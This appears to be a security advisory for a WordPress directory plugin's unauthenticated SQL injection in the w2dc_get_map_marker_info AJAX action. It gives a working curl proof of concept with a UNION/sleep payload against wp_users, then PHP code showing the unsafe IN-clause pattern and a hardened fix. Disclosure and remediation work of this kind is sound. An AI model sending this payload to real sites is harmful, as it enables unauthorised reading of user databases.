Description
The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection that is exploitable through several techniques (UNION-based, time-based and error-based).
curl --url 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' --data 'action=w2dc_get_map_marker_info&locations_ids%5B%5D=1+UNION+SELECT+null%2C68%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Csleep(10)+FROM+wp_users&map_id=1&show_summary_button=1&show_readmore_button=1'
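The root cause described above is an array parameter interpolated straight into an IN (...) clause. The following is an added illustration, not the plugin's own code: a hypothetical WordPress AJAX helper in the insecure shape the advisory describes, next to a hardened version that casts every id to an integer and binds it through $wpdb->prepare(). The function names, the table name and the $wpdb object passed in are assumptions for the example.

```php
<?php
// Added example (not the plugin's code): unsafe vs. hardened construction of
// an IN (...) clause from a user-supplied array such as locations_ids[].

// Stand-in for WordPress's absint() when run outside WordPress.
if (!function_exists('absint')) {
    function absint($value) { return abs((int) $value); }
}

// INSECURE (the pattern the advisory describes): array elements are joined
// verbatim, so a value like "1 UNION SELECT ..." becomes part of the query.
function example_unsafe_ids_sql($locations_ids, $table) {
    $ids = implode(',', (array) $locations_ids);
    return "SELECT * FROM {$table} WHERE id IN ({$ids})";
}

// HARDENED: every element is coerced to a positive integer, empty lists are
// rejected, and the statement is built with one %d placeholder per value via
// $wpdb->prepare() (the real WordPress database object in production).
function example_safe_ids_sql($wpdb, $locations_ids, $table) {
    $ids = array_values(array_filter(array_map('absint', (array) $locations_ids)));
    if (empty($ids)) {
        return null; // caller should respond with an error, not run a query
    }
    $placeholders = implode(',', array_fill(0, count($ids), '%d'));
    return $wpdb->prepare(
        "SELECT * FROM {$table} WHERE id IN ({$placeholders})",
        $ids
    );
}

// The AJAX handler itself should also verify a nonce and, unless the data is
// truly public, a capability before touching the database:
//   check_ajax_referer('example_nonce_action', 'nonce');
//   if (!current_user_can('read')) { wp_send_json_error(null, 403); }
```

With the hardened helper, a constructed input such as ['1 UNION SELECT ...'] collapses to the single integer 1, and the statement sent to MySQL is `... WHERE id IN (1)` regardless of what the client appended.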